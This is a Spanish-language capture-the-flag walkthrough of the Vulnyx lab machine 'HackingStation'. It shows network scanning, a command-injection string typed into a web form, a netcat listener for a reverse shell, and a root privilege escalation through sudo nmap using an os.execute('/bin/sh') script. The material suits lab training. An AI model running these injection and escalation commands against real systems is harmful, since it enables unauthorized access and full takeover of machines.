Máquina HackingStation (Vulnyx)
Comenzamos con averiguar la dirección Ip de la Máquina Víctima, para ello utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Víctima: 10.0.2.22
Comprobamos si tenemos conexión con la Máquina Víctima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.22
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux.
A continuación realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn 10.0.2.22 -sVC
Como podemos comprobar la Máquina Víctima tiene abierto el puerto 80.
Comprobamos que es lo que corre en el puerto 80.
Probamos en el input un Command Injection, para ello introducimos en el, lo siguiente:
hola;whoami
A continuación, en la terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat(nc) nos ponemos a la escucha por el puerto 443 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:
$ nc -lvnp 443
Nos creamos la siguiente reverse shell en busybox, y la pegamos en el formulario.
Y recibimos la conexión como ¡¡¡hacker!!!.
A continuación, hacemos un tratamiento de la TTY para obtener una shell interactiva y así evitar problemas, para ello ejecutamos los siguientes comandos:
$ script /dev/null -c bash
Ctrl + Z
$ stty raw -echo;fg
$ reset xterm
$ export TERM=xterm
Enumeramos lo permisos sudo, para ello ejecutamos el siguiente comando:
$ sudo -l
Nos encontramos con el binario nmap que lo podemos ejecutar como el usuario root, por lo tanto nos vamos a la pagina gtfobins a mirar el payload.
Escogemos la opción A, y la ejecutamos de la siguiente manera:
$ TF=$(mktemp)
$ echo 'os.execute("/bin/sh")' > $TF
$ sudo nmap --script=$TF
También pudiendo leer las flags de user y root.








